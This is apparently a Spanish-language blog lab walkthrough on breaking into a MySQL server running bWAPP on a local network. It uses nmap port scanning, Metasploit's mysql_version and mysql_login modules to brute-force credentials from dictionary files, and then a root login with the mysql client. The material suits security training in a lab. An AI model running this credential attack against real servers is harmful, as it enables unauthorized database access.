En esta práctica vamos a intentar entrar en una base de datos nuestra red local (sin firewall delante).
Antes habremos de haber instalado un servidor WAMP con bWAPP el cual tiene una BBDD MySQL.
Paso uno: Exploración:
Hacemos un escaneo de puertos del host local:
root@kali: # nmap 192.168.1.39
nos debolverá como reslutaado el puerto que buscamos:Nmap scan report for 192.168.1.39 3306/TCP open mysqlA continuación usaremos Metaexploit para probar contraseñas de Usuarios y Passwords contra ese puerto:
Primero ejecutamos metaexploit en Kali Linux:
root@kali:# msfconsole
Buscaremos el modulo auxiliar para esta tarea:Ejecutaremos un comando de reconomiento para saber la versión de MySQL:
msf> use auxiliary/scanner/mysql/mysql_version
luego ejecutaremos info para saber los parametros que necesita el comando:y pondremos la IP del host a atacar:
y por último lo ejecutamos:
msf> auxiliary(scanner/mysql/mysql_version) > info msf> auxiliary(scanner/mysql/mysql_version) > set RHOSTS 192.168.1.39 msf> auxiliary(scanner/mysql/mysql_version) > run
Nos devolverá la version.
Buscamos la rutina auxiliar que nos ayudará a realizar la prueba de contraseñas:
msf> use auxiliary/scanner/mysql/mysql_login
Introducimos los parametros necesarios, host a atacar y archivo de texto (diccionario) que contiene los usuarios/contraseñas y lo ejecutaremos:msf> auxiliary(scanner/mysql/mysql_login) set RHOSTS 192.168.1.39 msf> auxiliary(scanner/mysql/mysql_login) set PASS_FILE passwords.txt msf> auxiliary(scanner/mysql/mysql_login) set USER_FILE users.txt msf> auxiliary(scanner/mysql/mysql_login) runResultado:
Los txt los recoge de la ruta en la que esta el promt, en este caso en el mismo diretorio de trabajo /root.
Una vez conseguidos el usuario y contraseña, pasamos a utilizar enumeración con Metaesploit para conseguir información del servidor, usuarios con privilegios, directorios que permiten escritura, certificados, etc.
Para finalmente entrar en la base de datos bastaría con poner el usuario y contraseña que conseguimos antes, y poder ver las bases de datos con show databases por ejemplo.
root@kali: # mysql -h 192.168.1.39 -u root -p
No hay comentarios:
Publicar un comentario